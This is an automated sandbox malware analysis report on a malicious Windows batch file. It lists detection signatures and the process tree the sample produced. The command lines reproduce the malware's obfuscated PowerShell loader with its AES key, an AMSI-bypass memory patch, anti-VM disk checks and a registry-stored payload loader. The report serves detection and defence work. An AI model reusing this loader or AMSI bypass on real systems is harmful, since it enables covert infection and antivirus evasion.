Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1 (2).cmd

Overview

General Information

Sample name:1 (2).cmd
Analysis ID:1524984
MD5:64d17cf4e56c0fdc93365eb17914ce39
SHA1:4861be8ba1ba6d567f9950390f290bb8b860ccae
SHA256:7a83a44720d94be24a8e7745d6871d65afda849c4008ab72511dd5ac38c7378c
Tags:azure-winsecure-comcmduser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7532 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 7552 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 7624 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 7632 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7708 cmdline: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7720 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 7940 cmdline: C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 752 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6052 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 3228 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 2056 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 2332 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 2080 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 2300 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 4052 cmdline: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 7080 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 4300 cmdline: C:\Windows\system32\WerFault.exe -u -p 7080 -s 2400 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 4536 cmdline: C:\Windows\system32\WerFault.exe -u -p 7080 -s 2172 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 4788 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7580 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 7972 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 1484 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$YLRtgUHBybAeSz=$WRnqVVFrVLSrh.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PEmsRMlCSlPDgPcGUWk=aYWZgkdITfai @([String])([IntPtr]);$okFleUAeyDuwZAfHWQFfNP=aYWZgkdITfai @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aBWxSgKrnUs=$WRnqVVFrVLSrh.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$WzFkwARTzpFLOf=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'bra'+[Char](114)+'yA')));$qdgplTDpiNjVfetqy=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$WxFISlG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WzFkwARTzpFLOf,$PEmsRMlCSlPDgPcGUWk).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$BtHEHTUmMhFSXEmPh=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$WxFISlG,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$xiihgyajRQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,4,[ref]$xiihgyajRQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BtHEHTUmMhFSXEmPh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,0x20,[ref]$xiihgyajRQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](114)+''+[Char](98)+'x-s'+'t'+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 2384 cmdline: C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7720INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4c0d4d:$b2: ::FromBase64String(
  • 0x4c0dab:$b2: ::FromBase64String(
  • 0x53da02:$b2: ::FromBase64String(
  • 0x53ee34:$b2: ::FromBase64String(
  • 0x536b0:$s1: -join
  • 0x58359:$s1: -join
  • 0x43f2a1:$s1: -join
  • 0x44c376:$s1: -join
  • 0x44f748:$s1: -join
  • 0x44fdfa:$s1: -join
  • 0x4518eb:$s1: -join
  • 0x453af1:$s1: -join
  • 0x454318:$s1: -join
  • 0x454b88:$s1: -join
  • 0x4552c3:$s1: -join
  • 0x4552f5:$s1: -join
  • 0x45533d:$s1: -join
  • 0x45535c:$s1: -join
  • 0x455bac:$s1: -join
  • 0x455d28:$s1: -join
  • 0x455da0:$s1: -join

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if 